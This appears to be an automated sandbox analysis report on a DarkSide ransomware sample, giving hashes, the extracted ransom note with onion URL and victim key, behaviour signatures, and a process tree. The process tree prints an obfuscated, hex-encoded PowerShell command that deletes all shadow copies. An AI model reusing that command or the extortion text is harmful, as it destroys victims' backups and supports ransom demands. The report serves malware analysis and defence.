Analysis

  • max time kernel
    119s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    25-01-2022 23:29

General

  • Target

    mal.exe

  • Size

    512KB

  • MD5

    650d18a78f30302a1e10f664a0d2cb0a

  • SHA1

    c318776aefbd0156de1e6f7bba216d87e27c6341

  • SHA256

    2c7d10f64dc39ea9bd6f18d9d1e1204f0c62324e8da148354d557bba17e3c615

  • SHA512

    cb209a8c381e99c8adf49a2ea1caa0732da0ad5891b7b244dcf8540d677a03b7e912b4e121c25440a5bbf855a112b8c0061f0974922154c6bdf11eb176bd3c57

Malware Config

Extracted

Path

C:\\README.5bede5a3.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/GM0CG8TNZ83ZPUD15TL76BLDCG0ST24TR6NXG1J2AVXSKF8KS4KFIIN2ON5GRWD4 When you open our website, put the following data in the input form: Key: lsJTyyTnzJlGQ1I6sfwV6oVcXaRynwN6mWphA7BKXEDIHJcDlhNNHsrxlkpggRChK2nQ7wP0sknJvl37lbqElTopkUywK3QnfJFmqDBSCmFISeWSudjgwxB4kKSp7h4VySHeu4LmDiZXTAh1dbZHWxTtZ0bA6PhCoDrbGkctY4rucITW4IdYUZJC8d2B7SFnr5EA7EoRkajrZW54brM5Kgwqsz67qzH6Hk0Vr3EDcnGzNjGQBapJczIWkgPtMCJdTkeemQ34XH7wawXu3eOGV3uJlBZNoSuaxtDHMGApS8EWsUXhafMW8WxFLAPLCo6pdm7MLcLsVDp9iBXU1sLv2KkGyUJbO0KOmom9f1JREuidviHRfsndEgMFBAjyq5v4VEIraiioAbtWM7eecYaXPVt3rolsBi8mtjxLOpFj73NPPitoIDxBNfHGzXxvRTXi06Pjx9pRnAtjIqoq5wovnHa8uBel8nq8yDJTk7NWdGdsv3yVwV2TmBin7OvFqHN9lweFNJyuziKCVGEtSaglUNudMmpFnNObGlhfh58jQsrQiQZ2d3AOFsi !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/GM0CG8TNZ83ZPUD15TL76BLDCG0ST24TR6NXG1J2AVXSKF8KS4KFIIN2ON5GRWD4

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 18 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\mal.exe
    "C:\Users\Admin\AppData\Local\Temp\mal.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:840
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1152
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2028

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    dca47474df0cde618a6c40d9e950f745

    SHA1

    c903adc18447fec9b438e15b312f6b6b660562ac

    SHA256

    abb722e20aee9f5ef8820ed346b3c0d955c1520c73f8f62eed3130566a33f6f5

    SHA512

    927c8c12f3198c27a83682bd4835fffab486b1de19976d675d792d1f99cdd0b9a1de202b64e87d61faef6791238ac492dd0a8bfb731961173ac2b89b584666c5

  • memory/840-54-0x0000000000400000-0x000000000083B000-memory.dmp
    Filesize

    4.2MB

  • memory/840-55-0x0000000000A10000-0x0000000000A34000-memory.dmp
    Filesize

    144KB

  • memory/840-56-0x0000000000020000-0x0000000000030000-memory.dmp
    Filesize

    64KB

  • memory/840-57-0x0000000076491000-0x0000000076493000-memory.dmp
    Filesize

    8KB

  • memory/840-58-0x0000000000400000-0x000000000083B000-memory.dmp
    Filesize

    4.2MB

  • memory/1152-59-0x000007FEFC451000-0x000007FEFC453000-memory.dmp
    Filesize

    8KB

  • memory/1152-61-0x0000000002530000-0x0000000002532000-memory.dmp
    Filesize

    8KB

  • memory/1152-62-0x0000000002532000-0x0000000002534000-memory.dmp
    Filesize

    8KB

  • memory/1152-63-0x0000000002534000-0x0000000002537000-memory.dmp
    Filesize

    12KB

  • memory/1152-60-0x000007FEF2E30000-0x000007FEF398D000-memory.dmp
    Filesize

    11.4MB

  • memory/1152-64-0x000000000253B000-0x000000000255A000-memory.dmp
    Filesize

    124KB